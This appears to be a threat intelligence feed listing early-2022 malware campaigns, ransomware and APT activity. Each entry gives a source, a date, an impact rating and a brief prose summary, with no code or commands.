- Researchers from PaloAlto identified a spear phishing campaign which was attributed to UAC-0056. The target organization were from Ukraine and the payloads included the Document Stealer OutSteel and the Downloader SaintBot.
New wiper and worm targets Ukraine
HIGH
+
—
- Intel Source:
- WeLiveSecurity
- Intel Name:
- New wiper and worm targets Ukraine
- Date of Scan:
- 2022-03-01
- Impact:
- HIGH
- Summary:
- ESET researchers discovered new set of malwares and worm after the invasion of Russia on Ukraine. The malware was dubbed as IsaacWiper and HermeticWizard also a decoy ransomware called Hermeticransom aks Partyticket ransomware.
SockDetour Targets U.S. Defense Contractors
MEDIUM
+
—
- Intel Source:
- Palo Alto
- Intel Name:
- SockDetour Targets U.S. Defense Contractors
- Date of Scan:
- 2022-02-28
- Impact:
- MEDIUM
- Summary:
- Researchers from PaloAlto have came across a stealthy custom malware SockDetour that targeted U.S.-based defense contractors. Analysis shows that SockDetour was delivered from an external FTP server to a U.S.-based defense contractor's internet-facing Windows server.
Evolution of EvilCorp
MEDIUM
+
—
- Intel Source:
- SentinelOne
- Intel Name:
- Evolution of EvilCorp
- Date of Scan:
- 2022-02-28
- Impact:
- MEDIUM
- Summary:
- Researchers from Sentinel Labs have assessed with high confidence that WastedLocker Hades Phoenix Locker PayloadBIN belongs to the same cluster of malware which EvilCorp operates. A technical analysis was also done on the evolution evolution of Evil Corp from Dridex through to Macaw Locker and for the first time publicly describe CryptOne and the role it plays in Evil Corp malware development.
UNC2596 deploys Cuba ransomware
MEDIUM
+
—
- Intel Source:
- Mandiant
- Intel Name:
- UNC2596 deploys Cuba ransomware
- Date of Scan:
- 2022-02-28
- Impact:
- MEDIUM
- Summary:
- Mandiant researchers have tracked a ransomware gang as UNC2596 who also claims to be COLDDRAW and commonly known as Cuba ransomware have been found exploiting Microsoft Exchange vulnerabilities to gain initial access to corporate networks and encrypt devices. Cuba operation primarily targets the United States followed by Canada.
TrickBot Switches to New Malware
MEDIUM
+
—
- Intel Source:
- Intel471
- Intel Name:
- TrickBot Switches to New Malware
- Date of Scan:
- 2022-02-28
- Impact:
- MEDIUM
- Summary:
- As per the recent report by Intel 471 Trickbot is switching its operations and joining hands with Emotet operators. Also it has been noticed that Bazar malware family was also linked to trickbot recently as operators were taking over the TrickBot operations.
DDoS attacks against Ukrainian Websites
MEDIUM
+
—
- Intel Source:
- netlab360
- Intel Name:
- DDoS attacks against Ukrainian Websites
- Date of Scan:
- 2022-02-28
- Impact:
- MEDIUM
- Summary:
- NetLab360 researchers analyzed recent DDOS attack on Ukrainian websites and tracked botnets who were involved in it. Also as per them the C2s belong to multiple malware family including Mirai Gafgyt ripprbot moobot and ircBot.
MuddyWater_Seeder Queries_25/02/2022
HIGH
+
—
- Intel Source:
- STR
- Intel Name:
- MuddyWater_Seeder Queries_25/02/2022
- Date of Scan:
- 2022-02-28
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
Muddywater attacks U.S/Worldwide
HIGH
+
—
- Intel Source:
- FBI/NCSC/CISA
- Intel Name:
- Muddywater attacks U.S/Worldwide
- Date of Scan:
- 2022-02-25
- Impact:
- HIGH
- Summary:
- Authorities from US and UK have released a detailed advisory about the recent cyber espionage campaign of MuddyWater which is allegedly state sponsored by Iran and works in the interests of MOIS. In this current campaign they have been mainly targeting government and private organizations from industries including telecom defense oil & gas located in Asia Africa Europe and North America. This time they have come up with a variety of malwares ranging from PowGoop Small Sieve Mori and POWERSTATS
TeamTNT targeting Linux servers
MEDIUM
+
—
- Intel Source:
- Intezer
- Intel Name:
- TeamTNT targeting Linux servers
- Date of Scan:
- 2022-02-24
- Impact:
- MEDIUM
- Summary:
- Researchers at Intezer have alerted with TTPs of TeamTNT threat actor. Over the past year TeamTNT threat actor has been very active and is one of the predominant cryptojacking threat actors however currently targeting Linux servers.
Cyclops Blink malware by Sandworm
MEDIUM
+
—
- Intel Source:
- NCSC-UK
- Intel Name:
- Cyclops Blink malware by Sandworm
- Date of Scan:
- 2022-02-24
- Impact:
- MEDIUM
- Summary:
- A Joint advisory has been published by NCSC [UK] and CISA FBI NSA [USA] that identifies a new malware used by the actor Sandworm. Sandworm also known as Voodoo Bear has previously been attributed to Russia’s GRU. The malware dubbed Cyclops Blink appears to be a replacement for the VPNFilter malware exposed in 2018 and its deployment could allow Sandworm to remotely access networks. The advisory also includes information on the associated TTPs used by Sandworm.
HermeticWiper Malware
MEDIUM
+
—
- Intel Source:
- ESET
- Intel Name:
- HermeticWiper Malware
- Date of Scan:
- 2022-02-24
- Impact:
- MEDIUM
- Summary:
- ESET Research discovered a new data wiper malware used against Ukraine. ESET detected that it was installed on hundreds of machines in the country. This follows the DDoS attacks against several Ukrainian websites.
Operation Cache Panda
LOW
+
—
- Intel Source:
- CyCraft
- Intel Name:
- Operation Cache Panda
- Date of Scan:
- 2022-02-23
- Impact:
- LOW
- Summary:
- Researchers from Cycraft have came across campaign which has been targetting Taiwan's Financial trading sector with supply chain and this camapign has been attributed to allegedly state sponsored threat actor APT10.
Cobalt Strike targets MS-SQL servers
MEDIUM
+
—
- Intel Source:
- ASEC
- Intel Name:
- Cobalt Strike targets MS-SQL servers
- Date of Scan:
- 2022-02-22
- Impact:
- MEDIUM
- Summary:
- Researchers from ASEC discovered a campaign in which unpatched Microsoft SQL Database servers were targetted by distribution of Cobalt Strike. The attacker usually scans port 1433 to check if MS-SQL servers open to the public if its found open then they launch brute forcing or dictionary attacks against the admin account.
Predatory Sparrow targets Iran's BroadCaster
LOW
+
—
- Intel Source:
- Checkpoint
- Intel Name:
- Predatory Sparrow targets Iran's BroadCaster
- Date of Scan:
- 2022-02-22
- Impact:
- LOW
- Summary:
- A wave of cyberattacks has floaded Iran in 2021 and early 2022. CPR team has done a technical analysis on one of the attacks against Iranian national media corporation Islamic Republic of Iran Broadcasting (IRIB) which occurred in late January 2022.
Qbot utilized to exploit ZeroLogon Vulnerability
MEDIUM
+
—
- Intel Source:
- DFIR Report
- Intel Name:
- Qbot utilized to exploit ZeroLogon Vulnerability
- Date of Scan:
- 2022-02-22
- Impact:
- MEDIUM
- Summary:
- Researchers at DFIR Report has discovered that threat actors are exploiting Qbot and ZeroLogon vulnerability. The threat actor gained their initial access through the execution of a malicious DLL.
Katana Botnet exploited Ukrainian websites
MEDIUM
+
—
- Intel Source:
- Cado security
- Intel Name:
- Katana Botnet exploited Ukrainian websites
- Date of Scan:
- 2022-02-22
- Impact:
- MEDIUM
- Summary:
- A team from Cado security have identified the source as 'Katana botnet' (one of the Mirai variant) was behind the series of DDoS attacks against Ukrainian websites between 15-16 February. The impacted sites included Banks Government and Military websites. Moreover Ukrainian CERT 360Netlab and BadPackets have attributed the source of these attacks to Mirai botnet.
Arkei Infostealer utilizing SmokeLoader
MEDIUM
+
—
- Intel Source:
- Blackberry
- Intel Name:
- Arkei Infostealer utilizing SmokeLoader
- Date of Scan:
- 2022-02-22
- Impact:
- MEDIUM
- Summary:
- The latest analysis of the Arkei Infostealer shows that the cyber-thieves are increasingly targeting people using multifactor authentication as well as crypto-wallets. Arkei Infostealer is often sold and distributed as Malware-as-a-Service and has been spotted utilizing SmokeLoader as a method of deployment. Both Arkei and SmokeLoader have been identified using the same IOCs and known-malicious URLs to conduct their malicious operations.
CryptBot Infostealer
MEDIUM
+
—
- Intel Source:
- ASEC
- Intel Name:
- CryptBot Infostealer
- Date of Scan:
- 2022-02-22
- Impact:
- MEDIUM
- Summary:
- A new version of the CryptBot info stealer was found by ASEC researchers which was getting distributed via multiple websites that offer free downloads of cracks for games and pro-grade software. In the current version of the CryptoBot there is only one infostealing C2.
TunnelVision exploiting Log4j
MEDIUM
+
—
- Intel Source:
- SentinelOne
- Intel Name:
- TunnelVision exploiting Log4j
- Date of Scan:
- 2022-02-21
- Impact:
- MEDIUM
- Summary:
- SentinelOne researchers have observed some activities of TunnelVision attackers which focuses on exploitation of VMware Horion Lojg4j vulnerabilities. The attackers actively exploiting the vulnerability to run malicious PowerShell commands deploy backdoors create backdoor users harvest credentials and perform lateral movement. Moreover Researchers has been tracking the activity of the Iranian threat actor operating in the Middle-East and the US.
PseudoManuscrypt Malware
MEDIUM
+
—
- Intel Source:
- ASEC
- Intel Name:
- PseudoManuscrypt Malware
- Date of Scan:
- 2022-02-21
- Impact:
- MEDIUM
- Summary:
- Multiple windows machines in South Korea have been attacked by PseudoManuscrypt malware. This malware is said to be using the same tactics as of CryptBot. The malware's target have been mostly government and industrial organization.
Remcos RAT
MEDIUM
+
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Remcos RAT
- Date of Scan:
- 2022-02-21
- Impact:
- MEDIUM
- Summary:
- ISC SANS Researcher has shared an analysis for a sample received via email. The file was received as an attachment to a mail that pretended to be related to a purchase order. Later Researcher attributed the file to Remcos RAT.
Moses Staff targets Israeli Organization
MEDIUM
+
—
- Intel Source:
- Fortinet
- Intel Name:
- Moses Staff targets Israeli Organization
- Date of Scan:
- 2022-02-18
- Impact:
- MEDIUM
- Summary:
- Moses Staff threat actor has recently launched a new espionage campaign against Israeli organizations. This time they have been leveraging the ProxyShell vulnerability in Microsoft Exchange servers as an initial infection vector to deploy two web shells followed by exfiltrating Outlook Data Files (.PST) from the compromised server.
Kraken- A new botnet
MEDIUM
+
—
- Intel Source:
- ZeroFox
- Intel Name:
- Kraken- A new botnet
- Date of Scan:
- 2022-02-18
- Impact:
- MEDIUM
- Summary:
- Researchers from Zerofox have found a new golang based botneyt dubbed Kraken which is currently under development and has backdoor capabilities to siphon sensitive information from compromised Windows hosts. Their targets are crypto wallets which are not limited to Armory Atomic Wallet Bytecoin Electrum Ethereum Exodus Guarda Jaxx Liberty and Zcash.
Gamaredon targets Ukraine
HIGH
+
—
- Intel Source:
- Palo Alto
- Intel Name:
- Gamaredon targets Ukraine
- Date of Scan:
- 2022-02-18
- Impact:
- HIGH
- Summary:
- The Russia-linked Gamaredon hacking group aka Primitive Bear has been actively targetting wester government entity in Ukraine. The threat vector was phishing attack which leveraged a job search and employment platform within the country as a conduit to upload their malware downloader in the form of a resume for an active job listing related to the targeted entity.
Power BI Phishing Campaign
MEDIUM
+
—
- Intel Source:
- Cofense
- Intel Name:
- Power BI Phishing Campaign
- Date of Scan:
- 2022-02-18
- Impact:
- MEDIUM
- Summary:
- Cofense Phishing Defense Center has analysed a new phishing campaign that harvests Microsoft credentials by impersonating Power BI emails. Due to Power BI's popularity commonly used and vendor trust it has become the prime target for threat actors to spoof and abuse it for phishing attacks.
BlackByte TTP_Seeder Queries_16/02/2022
HIGH
+
—
- Intel Source:
- STR
- Intel Name:
- BlackByte TTP_Seeder Queries_16/02/2022
- Date of Scan:
- 2022-02-17
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
Emotet new Infection Method
MEDIUM
+
—
- Intel Source:
- Palo Alto
- Intel Name:
- Emotet new Infection Method
- Date of Scan:
- 2022-02-17
- Impact:
- MEDIUM
- Summary:
- Researchers at Palo Alto Unit42 have found that yet agan the infamous Emotet malware has switched tactics. In an email campaign propagating through malicious Excel files that includes an obfuscated Excel 4.0 macro through socially engineered emails. When the macro is activated it downloads and executes an HTML application that downloads two stages of PowerShell to retrieve and execute the final Emotet payload
ModifiedElephant APT
MEDIUM
+
—
- Intel Source:
- SentinelOne
- Intel Name:
- ModifiedElephant APT
- Date of Scan:
- 2022-02-17
- Impact:
- MEDIUM
- Summary:
- SentinelOne researchers attributed the intrusions to a group tracked as 'ModifiedElephant'. The threat actor has been operational since at least 2012 its activity aligns sharply with Indian state interests. The threat actor uses spear-phishing technique with malicious documents to deliver malware such as NetWire DarkComet and keyloggers.
GlowSpark Campaign
MEDIUM
+
—
- Intel Source:
- Inquest
- Intel Name:
- GlowSpark Campaign
- Date of Scan:
- 2022-02-17
- Impact:
- MEDIUM
- Summary:
- Inquest Labs researchers analysed a malicious document from the GlowSpark campaign which is a possible attack vector in the WhisperGate attack. Some samples of this campaign are quite secretive as it successfully infect the target. This allows the threat actor to gain a strong foothold in the victim's network without leaving a large footprint.
MyloBot Malware
MEDIUM
+
—
- Intel Source:
- Minerva Labs
- Intel Name:
- MyloBot Malware
- Date of Scan:
- 2022-02-16
- Impact:
- MEDIUM
- Summary:
- A new version of the MyloBot malware has been observed to deploy malicious payloads that are being used to send sextortion emails demanding victims a huge sum in form of digital currency. MyloBot also leverages a technique called process hollowing wherein the attack code is injected into a suspended and hollowed process in order to circumvent process-based defenses.
LockBit 2.0 Ransomware TTPs
HIGH
+
—
- Intel Source:
- Picus Security
- Intel Name:
- LockBit 2.0 Ransomware TTPs
- Date of Scan:
- 2022-02-16
- Impact:
- HIGH
- Summary:
- On 4th Feb 2022 FBI issued a Flash report on Lockbit 2.0 Ransomware and few IoCs. Picus Security team has also shared TTPs used by the Lockbit 2.0 ransomware operators in emerging ransomware campaigns.
Trickbot Attacks Global Giants customers
MEDIUM
+
—
- Intel Source:
- Checkpoint
- Intel Name:
- Trickbot Attacks Global Giants customers
- Date of Scan:
- 2022-02-16
- Impact:
- MEDIUM
- Summary:
- Researchers from Checkpoint analyzed new evasive technique of TrickBot and also found this time it has been targetting more than 60 firm's customers worldwide. The trickbot operators have been using AntiAnalysis techniques so that researchers can't send automated requests to Command-and-Control servers to get fresh web-injects.
TA2541 APT targets Aviation
MEDIUM
+
—
- Intel Source:
- Proofpoint
- Intel Name:
- TA2541 APT targets Aviation
- Date of Scan:
- 2022-02-16
- Impact:
- MEDIUM
- Summary:
- ProofPoint researchers have identified threat actor TA2541 to be tragetting avaiation and aersospace industries. The threat actor commonly uses RATs through which they can control compromised machines. It is said that target can be 100 of organizations from North America Europe and the Middle East.
BitRAT malware
MEDIUM
+
—
- Intel Source:
- Fortinet
- Intel Name:
- BitRAT malware
- Date of Scan:
- 2022-02-16
- Impact:
- MEDIUM
- Summary:
- Threat actors are leveraging NFT (Non-fungible tokens) information to lure users into downloading the BitRAT malware. The campaign makes use of malicious Excel files named ‘NFT_Items’ to attract targets. These files are hosted on the Discord app and appear to contain names of NFTs forecasts for potential investment returns and selling quantities.
ShadowPad RAT linked to Chinese government
MEDIUM
+
—
- Intel Source:
- SecureWorks
- Intel Name:
- ShadowPad RAT linked to Chinese government
- Date of Scan:
- 2022-02-16
- Impact:
- MEDIUM
- Summary:
- Researchers from SecureWorks were able to link recent activity of ShadowPad malware to multiple threat actors from China whose activity can be linked to Chinese ministry and PLA. It is the same malware which was behind the attacks on NetSarang CCleaner and ASUS.
BlackByte Ransomware
MEDIUM
+
—
- Intel Source:
- FBI FLASH
- Intel Name:
- BlackByte Ransomware
- Date of Scan:
- 2022-02-15
- Impact:
- MEDIUM
- Summary:
- BlackByte ransomware had compromised multiple US and foreign businesses including entities in at least three US critical infrastructure sectors (government facilities financial and food & agriculture). Recently it came in news when the tansomware attacked San Francisco 49ers ahead of the Super Bowl.
Magecart attacking Magento sites
MEDIUM
+
—
- Intel Source:
- Sansec
- Intel Name:
- Magecart attacking Magento sites
- Date of Scan:
- 2022-02-15
- Impact:
- MEDIUM
- Summary:
- According to Sansec more than 350 ecommerce stores infected with malware in a single day. All stores were victim of a payment skimmer loaded from a domain. The doamin is currently offline however the goal of the threat actors was to steal the credit card information of customers on the targeted online stores.
OilRig's New Espionage Campaign-Out To Sea
MEDIUM
+
—
- Intel Source:
- ESET
- Intel Name:
- OilRig's New Espionage Campaign-Out To Sea
- Date of Scan:
- 2022-02-14
- Impact:
- MEDIUM
- Summary:
- Recently Researchers from ESET discovered a new campaign dubbed 'Out to Sea'. This campaign was attributed to APT34(OilRig) which had also links with Lyceum group. Their malware toolset has also been developed and they have come up with a backdoor named Marlin.
SolarMarker Campaign
MEDIUM
+
—
- Intel Source:
- Sophos
- Intel Name:
- SolarMarker Campaign
- Date of Scan:
- 2022-02-11
- Impact:
- MEDIUM
- Summary:
- SophosLabs has monitored a series of new efforts to distribute SolarMarker an information stealer and backdoor. It was first detected in 2020 the .NET malware usually delivered by a PowerShell installer has information harvesting and backdoor capabilities.
CoinStomp Malware
MEDIUM
+
—
- Intel Source:
- Cado security
- Intel Name:
- CoinStomp Malware
- Date of Scan:
- 2022-02-11
- Impact:
- MEDIUM
- Summary:
- Cado Security Researchers has discovered a new malware campaign targeting Asian Cloud Service Providers (CSPs). Researchers dubbed the malware as CoinStomp this family of malware exploit cloud compute instances for the purpose of mining cryptocurrency.
Transparent Tribe Group/APT36
HIGH
+
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Transparent Tribe Group/APT36
- Date of Scan:
- 2022-02-11
- Impact:
- HIGH
- Summary:
- Researchers from Talos recently analyszed Crimson RAT and Oblique RATS sample and were able to attribute the attck to Transparent Tribe Threat group also knows as APT36. The thraet actor is known to be targetting India.Their initial infection vector is usually email purporting to come from official sources and containing a lure which can be a Word document or more often an Excel spreadsheet.
Emotet dropping Cobalt Strike
HIGH
+
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Emotet dropping Cobalt Strike
- Date of Scan:
- 2022-02-11
- Impact:
- HIGH
- Summary:
- Researchers at SANS has disected a Cobalt Strike sample dropped by Emotet and shared their analysis.
Lorenz Ransomware
MEDIUM
+
—
- Intel Source:
- Cybereason
- Intel Name:
- Lorenz Ransomware
- Date of Scan:
- 2022-02-11
- Impact:
- MEDIUM
- Summary:
- Lorenz Ransomware was first seen in February 2021 and it is believed to be a rebranding of '.s40' ransomware. Lorenz Ransomware targets organisations worldwide with customised attacks and targeting victims mostly in English-speacking countries.
RedLine Stealer disguised as Windows 11 installer
MEDIUM
+
—
- Intel Source:
- HP
- Intel Name:
- RedLine Stealer disguised as Windows 11 installer
- Date of Scan:
- 2022-02-11
- Impact:
- MEDIUM
- Summary:
- Threat actors have started luring Windows10 users soon after the announcement of Windows11 upgrade. They are using a fake microsoft website to trick users into downloading and running a fake installer and executing RedLine stealer malware.
Molerat Palestinian-Aligned Espionage campaign
HIGH
+
—
- Intel Source:
- Proofpoint
- Intel Name:
- Molerat Palestinian-Aligned Espionage campaign
- Date of Scan:
- 2022-02-10
- Impact:
- HIGH
- Summary:
- A new campaign have been discovered by proofpoint researchers which details about operations of Molerat threat group who is allegedly affliated with Palestanine interest. TA402 is not only abusing Dropbox services for delivery of NimbleMamba but also for malware command and control (C2).
PrivateLoader
MEDIUM
+
—
- Intel Source:
- Intel471
- Intel Name:
- PrivateLoader
- Date of Scan:
- 2022-02-10
- Impact:
- MEDIUM
- Summary:
- An analysis of a pay-per-install loader by Intel471 researchers has highlighted its place in the deployment of popular malware strains including Smokeloader Vidar and Redline. The distribution of PrivateLoader is mostly through cracked software websites.
SEO Poisoning distributes BATLOADER malware
HIGH
+
—
- Intel Source:
- Mandiant
- Intel Name:
- SEO Poisoning distributes BATLOADER malware
- Date of Scan:
- 2022-02-09
- Impact:
- HIGH
- Summary:
- Mandiant researchers uncovered a malicious campaign using SEO poisoning to trick potential victims into downloading the BATLOADER malware. The attackers created malicious sites and packed it with keywords of popular software products and used search engine optimization poisoning to make them show up higher in search results.
Lazarus APT targeting job seekers
LOW
+
—
- Intel Source:
- CyberGeeks
- Intel Name:
- Lazarus APT targeting job seekers
- Date of Scan:
- 2022-02-09
- Impact:
- LOW
- Summary:
- Lazarus APT is yet again targeting job seekers and using job opportunities documents for companies such as LockHeed Martin BAE Systems and Boeing. In this blog researcher analysed document called Boeing BDS MSE.docx it focuses on people that are looking for jobs at Boeing. The malware extracts the hostname username network information a list of processes and other information that will be exfiltrated to one out of the four C2 servers.
Mac Trojan:Update Agent
MEDIUM
+
—
- Intel Source:
- Microsoft
- Intel Name:
- Mac Trojan:Update Agent
- Date of Scan:
- 2022-02-09
- Impact:
- MEDIUM
- Summary:
- The Mac trojan has evolved and its avatar by name UpdateAgent has added multiple capabilities to its artillerylike bypassing gatekeeper. It lures its victims by impersonating legitimate software and can leverage Mac device functionalities to its benefit.
Chinese APT Antlion targets financial institutions
LOW
+
—
- Intel Source:
- Symantec
- Intel Name:
- Chinese APT Antlion targets financial institutions
- Date of Scan:
- 2022-02-09
- Impact:
- LOW
- Summary:
- Antlion (Chinese state-backed APT) has been targeting financial institutions in Taiwan in a persistent campaign over the course of at least 18 months. The attackers deployed a custom backdoor we have called xPack on compromised systems which gave them extensive access to victim machines.
Arid Viper APT
MEDIUM
+
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Arid Viper APT
- Date of Scan:
- 2022-02-09
- Impact:
- MEDIUM
- Summary:
- Cisco Talos has observed a new wave of Delphi malware called Micropsia developed and operated by the Arid Viper APT group since 2017. This campaign targets Palestinian entities and activists using politically themed lures. This is a group believed to be based out of Gaza that's known to target organizations all over the world.
Operation EmailThief
MEDIUM
+
—
- Intel Source:
- Volexity
- Intel Name:
- Operation EmailThief
- Date of Scan:
- 2022-02-09
- Impact:
- MEDIUM
- Summary:
- Alleged Chinese threat actor tracked as TEMP_Heretic is actively attempting to exploit a zero-day XSS vulnerability in the Zimbra open-source email platform. The campaign has been named as EmailThief. The successful exploitation of the cross-site scripting (XSS) vulnerability could allow threat actors to execute arbitrary JavaScript code.
QakBot Phishing campaign
HIGH
+
—
- Intel Source:
- DFIR Report
- Intel Name:
- QakBot Phishing campaign
- Date of Scan:
- 2022-02-09
- Impact:
- HIGH
- Summary:
- Qakbot activities since October 2021 has been demystified by DFIR researchers. A malicious email campaign was used to deliver an Excel (xls) document. Following the opening of the xls document the initial Qbot DLL loader was downloaded and saved to disk.
Gold Dragon Malware
MEDIUM
+
—
- Intel Source:
- AhnLab
- Intel Name:
- Gold Dragon Malware
- Date of Scan:
- 2022-02-08
- Impact:
- MEDIUM
- Summary:
- A new wave of activity from the Kimsuky hacking group have been spotted by ASEC analysis team. Group was using xRAT (open-source RAT) and dropped with their custom backdoor dubbed as Gold Dragon. The campaign started on January 24 2022 targeting South Korean entitites and is still ongoing.
Lockbit 2.0 TTP_Seeder Queries_07/02/2022
MEDIUM
+
—
- Intel Source:
- STR
- Intel Name:
- Lockbit 2.0 TTP_Seeder Queries_07/02/2022
- Date of Scan:
- 2022-02-08
- Impact:
- MEDIUM
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
LockBit 2.0 Ransomware
HIGH
+
—
- Intel Source:
- FBI FLASH
- Intel Name:
- LockBit 2.0 Ransomware
- Date of Scan:
- 2022-02-08
- Impact:
- HIGH
- Summary:
- LockBit 2.0 operates as an affiliate-based Ransomware-as-a-Service (RaaS) and employs a wide variety of tactics techniques and procedures (TTPs). LockBit 2.0 ransomware compromises victim networks through a variety of techniques including but not limited to purchased access unpatched vulnerabilities insider access and zero day exploits.
QBot_Seeder Queries_07/02/2022
MEDIUM
+
—
- Intel Source:
- STR
- Intel Name:
- QBot_Seeder Queries_07/02/2022
- Date of Scan:
- 2022-02-08
- Impact:
- MEDIUM
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
BazarBackdoor malware campaign
MEDIUM
+
—
- Intel Source:
- Bleeping Computer
- Intel Name:
- BazarBackdoor malware campaign
- Date of Scan:
- 2022-02-07
- Impact:
- MEDIUM
- Summary:
- A new phishing campaign is using specially crafted CSV text files to infect users' devices with the BazarBackdoor malware. The phishing emails pretend to be 'Payment Remittance Advice' with links to remote sites that download a CSV file with names similar to 'document-21966.csv.'
Blackcat Ransomware_Seeder Queries_04/02/2022
HIGH
+
—
- Intel Source:
- STR
- Intel Name:
- Blackcat Ransomware_Seeder Queries_04/02/2022
- Date of Scan:
- 2022-02-07
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
StrifeWater RAT added to Iranian APT Moses Staff arsenal
MEDIUM
+
—
- Intel Source:
- Cybereason
- Intel Name:
- StrifeWater RAT added to Iranian APT Moses Staff arsenal
- Date of Scan:
- 2022-02-04
- Impact:
- MEDIUM
- Summary:
- Researchers discovered a previously unidentified Remote Access Trojan (RAT) in the Moses Staff arsenal dubbed StrifeWater. The StrifeWater RAT appears to be used in the initial stage of the attack and this stealthy RAT has the ability to remove itself from the system to cover the Iranian group’s tracks. The RAT possesses other capabilities such as command execution and screen capturing as well as the ability to download additional extensions.
White Tur Threat Group
MEDIUM
+
—
- Intel Source:
- PWC
- Intel Name:
- White Tur Threat Group
- Date of Scan:
- 2022-02-04
- Impact:
- MEDIUM
- Summary:
- A newly detailed threat actor has been observed employing various techniques borrowed from multiple advanced persistent threat (APT) actors dubbed as 'White Tur' the adversary hasn’t been attributed to a specific geography although it appears to have been active since at least 2017. The adversary was also observed abusing the open source project OpenHardwareMonitor for payload execution.
Sugar Ransomware
MEDIUM
+
—
- Intel Source:
- Walmart Global Tech Blog
- Intel Name:
- Sugar Ransomware
- Date of Scan:
- 2022-02-04
- Impact:
- MEDIUM
- Summary:
- Recently an threat actor has been starting up a RaaS solution that appears to primarily focus on individual computers instead of entire enterprises but is also reusing objects from other ransomware families. Researchers analysed sample from a tweet and concluded it as Sugar Ransomware.
Mars Stealer- New variant of Oski Stealer
LOW
+
—
- Intel Source:
- @3xport
- Intel Name:
- Mars Stealer- New variant of Oski Stealer
- Date of Scan:
- 2022-02-04
- Impact:
- LOW
- Summary:
- A new variant of Oski stealer has been identified in the wild named Mars Stealer.It has capability to steal information from all popular web browsers two-factor authentication plugins and multiple cryptocurrency extensions and wallets.
WhisperGate Lateral Movement_Seeder Queries_02/02/2022
HIGH
+
—
- Intel Source:
- STR
- Intel Name:
- WhisperGate Lateral Movement_Seeder Queries_02/02/2022
- Date of Scan:
- 2022-02-03
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
PowerLess Trojan by Phosphorus/APT35
HIGH
+
—
- Intel Source:
- Cybereason
- Intel Name:
- PowerLess Trojan by Phosphorus/APT35
- Date of Scan:
- 2022-02-03
- Impact:
- HIGH
- Summary:
- Cybereason researchers recently discovered a new set of tools which were developed by the Phosphorus group and incorporated into their arsenal including a novel PowerShell backdoor dubbed PowerLess Backdoor. Research also highlights a stealthy technique used by the group to avoid PowerShell detection by running the PowerShell Backdoor in a .NET context rather than spawning the PowerShell process.
MuddyWater targets Turkish users
HIGH
+
—
- Intel Source:
- Cisco Talos
- Intel Name:
- MuddyWater targets Turkish users
- Date of Scan:
- 2022-02-03
- Impact:
- HIGH
- Summary:
- Researchers at Cisco Talos has observed a new campaign targeting Turkish private organizations alongside governmental institutions. They have attributes this campaign with high confidence to MuddyWater which utilizes malicious PDFs XLS files and Windows executables to deploy malicious PowerShell-based downloaders acting as initial footholds.
StellarParticle campaign by CozyBear/APT29
HIGH
+
—
- Intel Source:
- CrowdStrike
- Intel Name:
- StellarParticle campaign by CozyBear/APT29
- Date of Scan:
- 2022-02-02
- Impact:
- HIGH
- Summary:
- Researchers at Crowdstrike has tracked activities of the StellatPraticle campaign and its association with the COZY BEAR adversary group. They have also disccussed about the Tactics and Techniques leveraged in StellarPraticle few of the techniques are - Credential hopping use of TrailBlazer implant and Linux variant of GoldMax malware etc.
ShuckWorm targets Ukraine
MEDIUM
+
—
- Intel Source:
- Symantec
- Intel Name:
- ShuckWorm targets Ukraine
- Date of Scan:
- 2022-02-02
- Impact:
- MEDIUM
- Summary:
- Symenatec researchers cam through a cyber espionage campaign targetting Ukraine. This campaign was attributed a famous threat actor group called Shuckworm which is allegedly a state sponsored threat group from Russia.
BotenaGo Malware
MEDIUM
+
—
- Intel Source:
- AT&T
- Intel Name:
- BotenaGo Malware
- Date of Scan:
- 2022-02-02
- Impact:
- MEDIUM
- Summary:
- BotenaGo malware source code is now available to any malicious hacker or malware developer. With only 2 891 lines of code BotenaGo has the potential to be the starting point for many new variants and new malware families using its source code. Alien Labs expects to see new campaigns based on BotenaGo variants targeting routers and IoT devices globally.
Lazarus APT
HIGH
+
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Lazarus APT
- Date of Scan:
- 2022-02-02
- Impact:
- HIGH
- Summary:
- This attack including a clever use of Windows Update to execute the malicious payload and GitHub as a command and control server by North Korean APT.
Belarusian Cyber-Partisans group attack national railways
LOW
+
—
- Intel Source:
- Curated Intel
- Intel Name:
- Belarusian Cyber-Partisans group attack national railways
- Date of Scan:
- 2022-02-01
- Impact:
- LOW
- Summary:
- Belarusian hacktivist group aka Belarusian Cyber-Partisans claimed responsibility for a limited attack against the national railway company. A primary objective of the attack they claimed was aimed at hindering Russian troop movements inside Belarus. Initial access via BlueKeep RCE (CVE-2019-0708) in RDP in a Windows Server 2008 R2 system. Used the 3proxy[.]ru service to launch attacks from a VPS. Use of Mimikatz to dump LSASS etc..
APT 27 targetting German Companies
LOW
+
—
- Intel Source:
- Federal Office_German Government
- Intel Name:
- APT 27 targetting German Companies
- Date of Scan:
- 2022-02-01
- Impact:
- LOW
- Summary:
- German government informed about a Chinese cyberespionage campaign who have been targetting german companies by exploiting vulnerabilities in Microsoft exchange and ZOHO Self service. In this campaign HyperBro malware was used.
WaspLocker Ransomware
LOW
+
—
- Intel Source:
- Cyfirma
- Intel Name:
- WaspLocker Ransomware
- Date of Scan:
- 2022-02-01
- Impact:
- LOW
- Summary:
- WaspLocker is a ransomware which encrypts files on your system with AES+RSA encryption and append the encrypted files with .0.locked extension and put them in a folder with extension .locked. It spreads via phishing spear phishing and social engineering tactics.
Chaes Banking Trojan
HIGH
+
—
- Intel Source:
- Avast
- Intel Name:
- Chaes Banking Trojan
- Date of Scan:
- 2022-01-31
- Impact:
- HIGH
- Summary:
- Researchers from Avast discovered that Chaes banking Trojan has been actively spreading since November 2020. Chaes is its multi-stage distribution method which makes use of programming frameworks such as JScript Python and NodeJS binary files written in Delphi as well as malicious Google Chrome extensions among other things.
Prophet Spider exploiting Log4j Vulnerability
HIGH
+
—
- Intel Source:
- Blackberry
- Intel Name:
- Prophet Spider exploiting Log4j Vulnerability
- Date of Scan:
- 2022-01-31
- Impact:
- HIGH
- Summary:
